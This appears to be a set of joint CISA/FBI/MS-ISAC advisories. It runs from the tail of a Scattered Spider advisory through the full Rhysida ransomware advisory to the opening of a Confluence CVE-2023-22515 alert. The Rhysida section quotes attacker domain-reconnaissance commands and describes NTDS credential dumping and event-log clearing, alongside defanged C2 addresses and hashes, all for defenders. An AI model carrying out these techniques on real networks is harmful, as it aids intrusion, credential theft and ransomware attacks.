(CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Reduce threat of malicious actors using remote access tools by: Auditing remote access tools on your network to identify currently used and/or authorized software. Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T]. Using security software to detect instances of remote access software being loaded only in memory. Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs). Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter. Applying recommendations in the Guide to Securing Remote Access Software. Implementing FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA. These MFA implementations are resistant to phishing and not suspectable to push bombing or SIM swap attacks, which are techniques known to be used by Scattered Spider actors. See CISA’s fact sheet Implementing Phishing-Resistant MFA for more information. Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R]. Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies. Implement password policies in compliance with NIST’s standards. Use “strong” passwords that are unique and random, as well as contain at least sixteen characters and no more than 64 characters in length [CPG 2.B]. Consider implementing industry-recognized password managers that align with organizational technology procurement policies. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints.” Refrain from requiring recurring password changes.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. Require administrator credentials to install software. Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Install, regularly update, and enable real time detection for antivirus software on all hosts. Disable unused ports and protocols [CPG 2.V]. Consider adding an email banner to emails received from outside your organization [CPG 2.M]. Disable hyperlinks in received emails. Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 4-17). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. REPORTING The FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). REFERENCES [1] MITRE ATT&CK – Scattered Spider [2] Trellix - Scattered Spider: The Modus Operandi [3] Crowdstrike - Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies [4] Crowdstrike - SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security [5] Malwarebytes - Ransomware group steps up, issues statement over MGM Resorts compromise DISCLAIMER The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI and CISA. VERSION HISTORY November 16, 2023: Initial version. November 21, 2023: Updated password recommendation language on page 12.

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks. FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents. Download the PDF version of this report: AA23-319A #StopRansomware: Rhysida Ransomware (PDF, 674.56 KB ) For a downloadable copy of IOCs, see: AA23-319A STIX XML (XML, 115.31 KB ) AA23-319A STIX JSON (JSON, 65.69 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity. Overview Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates. For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society. Initial Access Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3] Living off the Land Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities. Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed. net user [username] /domain [T1087.002] net group “domain computers” /domain [T1018] net group “domain admins” /domain [T1069.002] net localgroup administrators [T1069.001] Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content. Leveraged Tools Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors. Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions. Table 1: Tools Leveraged by Rhysida Actors Name Description cmd.exe The native command line prompt utility. PowerShell.exe A native command line tool used to start a Windows PowerShell session in a Command Prompt window. PsExec.exe A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution. mstsc.exe A native tool that establishes an RDP connection to a host. PuTTY.exe Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004]. PortStarter A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1] secretsdump A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances. ntdsutil.exe A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users. Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised. AnyDesk A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. wevtutil.exe A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001]. PowerView A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials. Rhysida Ransomware Characteristics Execution In one investigation, Rhysida actors created two folders in the C:\ drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption. Table 2: Malicious Executables Affiliated with Rhysida Infections File Name Hash (SHA256) Description conhost.exe 6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010 A ransomware binary. psexec.exe 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b A file used to execute a process on a remote or local host. S_0.bat 1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597 A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003]. 1.ps1 4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183 Identifies an extension block list of files to encrypt and not encrypt. S_1.bat 97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4 A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:\Windows\Temp directory of each system. S_2.bat 918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1 Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .Rhysida across the environment. Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587]. Encryption After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe. Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection. Data Extortion Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal. Figure 1: Rhysida Ransom NoteIdentified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8] INDICATORS OF COMPROMISE On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10] Table 3: C2 IP Addresses Used for Rhysida Operations C2 IP Address 5.39.222[.]67 5.255.99[.]59 51.77.102[.]106 108.62.118[.]136 108.62.141[.]161 146.70.104[.]249 156.96.62[.]58 157.154.194[.]6 Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org. Table 4: Email Addresses Used to Support Rhysida Operations Email Address rhysidaeverywhere@onionmail[.]org rhysidaofficial@onionmail[.]org Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations. Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions. Table 5: Files Used to Support Rhysida Operations File Name Hash (SHA256) Sock5.sh 48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57 PsExec64.exe edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef PsExec.exe 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b PsGetsid64.exe 201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa PsGetsid.exe a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb PsInfo64.exe de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7 PsInfo.exe 951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501 PsLoggedon64.exe fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea PsLoggedon.exe d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef PsService64.exe 554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d PsService.exe d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c Eula.txt 8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a psfile64.exe be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21 psfile.exe 4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329 pskill64.exe 7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d pskill.exe 5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 pslist64.exe d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60 pslist.exe ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a psloglist64.exe 5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636 psloglist.exe dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f pspasswd64.exe 8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f pspasswd.exe 6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801 psping64.exe d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285 psping.exe 355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140 psshutdown64.exe 4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400 psshutdown.exe 13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123 pssuspend64.exe 4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee pssuspend.exe 95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd PSTools.zip a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61 Pstools.chm 2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc psversion.txt 8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4 psexesvc.exe This artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable. MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Additional notable TTPs have been published by the Check Point Incident Response Team.[11] Table 6: Resource Development Technique Title ID Use Develop Capabilities T1587 Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems. Table 7: Initial Access Technique Title ID Use Valid Accounts T1078 Rhysida actors are known to use valid credentials to access internal VPN access points of victims. Exploit Public-Facing Application T1190 Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol. Phishing T1566 Rhysida actors are known to conduct successful phishing attacks. Table 8: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Rhysida actors used PowerShell commands (ipconfig, nltest, net) and various scripts to execute malicious actions. Command and Scripting Interpreter: Windows Command Shell T1059.003 Rhysida actors used batch scripting to place 1.ps1 on victim systems to automate ransomware execution. Table 9: Privilege Escalation Technique Title ID Use Process Injection: Portable Executable Injection T1055.002 Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems. Table 10: Defense Evasion Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs. Indicator Removal: File Deletion T1070.004 Rhysida actors used PowerShell commands to delete binary strings. Hide Artifacts: Hidden Window T1564.003 Rhysida actors have executed hidden PowerShell windows. Table 11: Credential Access Technique Title ID Use OS Credential Dumping: NTDS T1003.003 Rhysida actors have been observed using secretsdump to extract credentials and other confidential information from a system, then dumping NTDS credentials. Modify Registry T1112 Rhysida actors were observed running registry modification commands via cmd.exe. Table 12: Discovery Technique Title ID Use System Network Configuration Discovery T1016 Rhysida actors used the ipconfig command to enumerate victim system network settings. Remote System Discovery T1018 Rhysida actors used the command net group “domain computers” /domain to enumerate servers on a victim domain. System Owner/User Discovery T1033 Rhysida actors leveraged whoami and various net commands within PowerShell to identify logged-in users. Permission Groups Discovery: Local Groups T1069.001 Rhysida actors used the command net localgroup administrators to identify accounts with local administrator rights. Permission Groups Discovery: Domain Groups T1069.002 Rhysida actors used the command net group “domain admins” /domain to identify domain administrators. Account Discovery: Domain Account T1087.002 Rhysida actors used the command net user [username] /domain to identify account information. Domain Trust Discovery T1482 Rhysida actors used the Windows utility nltest to enumerate domain trusts. Table 13: Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 Rhysida actors are known to use RDP for lateral movement. Remote Services: SSH T1021.004 Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH. Table 14: Command and Control Technique Title ID Use Remote Access Software T1219 Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence. Table 15: Impact Technique Title ID Use Data Encrypted for Impact T1486 Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm. Financial Theft T1657 Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid. MITIGATIONS FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage. Require phishing-resistant MFA for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems [CPG 2.H]. Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N]. Implement verbose and enhanced logging within processes such as command line auditing[12] and process tracking[13]. Restrict the use of PowerShell using Group Policy and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems should be permitted to use PowerShell [CPG 2.E]. Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T]. Enable enhanced PowerShell logging [CPG 2.T, 2.U]. PowerShell logs contain valuable data, including historical operating system and registry interaction and possible TTPs of a threat actor’s PowerShell use. Ensure PowerShell instances (using the latest version) have module, script block, and transcription logging enabled (e.g., enhanced logging). The two logs that record PowerShell activity are the PowerShell Windows event log and the PowerShell operational log. FBI, CISA, and the MS-ISAC recommend turning on these two Windows event logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible. Restrict the use of RDP and other remote desktop services to known user accounts and groups. If RDP is necessary, apply best practices such as [CPG 2.W]: Implement MFA for privileged accounts using RDP. Use Remote Credential Guard[14] to protect credentials, particularly domain administrator or other high value accounts. Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Log RDP login attempts. Secure remote access tools by: Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important as antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Apply the recommendations in CISA's joint Guide to Securing Remote Access Software. In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E]. Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support the enforcement of PoLP (as well as the zero trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the AD level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Maintain offline backups of data and regularly maintain backups and their restoration (daily or weekly at minimum). By instituting this practice, organizations limit the severity of disruption to business operations [CPG 2.R]. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. Forward log files to a hardened centralized logging server, preferably on a segmented network [CPG 2.F]. Review logging retention rates, such as for VPNs and network-based logs. Consider adding an email banner to emails received from outside your organization [CPG 2.M]. Disable hyperlinks in received emails. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 6-15). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES CISA: #StopRansomware CISA: #StopRansomware Vice Society CISA: Known Exploited Vulnerabilities Catalog NIST: CVE-2020-1472 CISA, MITRE: Best Practices for MITRE ATT&CK Mapping CISA: Decider Tool CISA: Cross-Sector Cybersecurity Performance Goals CISA: Secure by Design CISA: Implementing Phishing-Resistant MFA CISA: Guide to Securing Remote Access Software REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870. REFERENCES Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector FortiGuard Labs: Ransomware Roundup - Rhysida Microsoft: Security Update Guide - CVE-2020-1472 Microsoft: Master File Table (Local File Systems) SentinelOne: Rhysida Secplicity: Scratching the Surface of Rhysida Ransomware Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware SOC Radar: Rhysida Ransomware Threat Profile Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida Sophos: Vice Society - Rhysida IOCs (GitHub) Check Point Research: Rhysida Ransomware - Activity and Ties to Vice Society Microsoft: Command Line Process Auditing Microsoft: Audit Process Tracking Microsoft: Remote Credential Guard ACKNOWLEDGEMENTS Sophos contributed to this CSA. DISCLAIMER The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC. VERSION HISTORY November 15, 2023: Initial version.

SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation. CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While 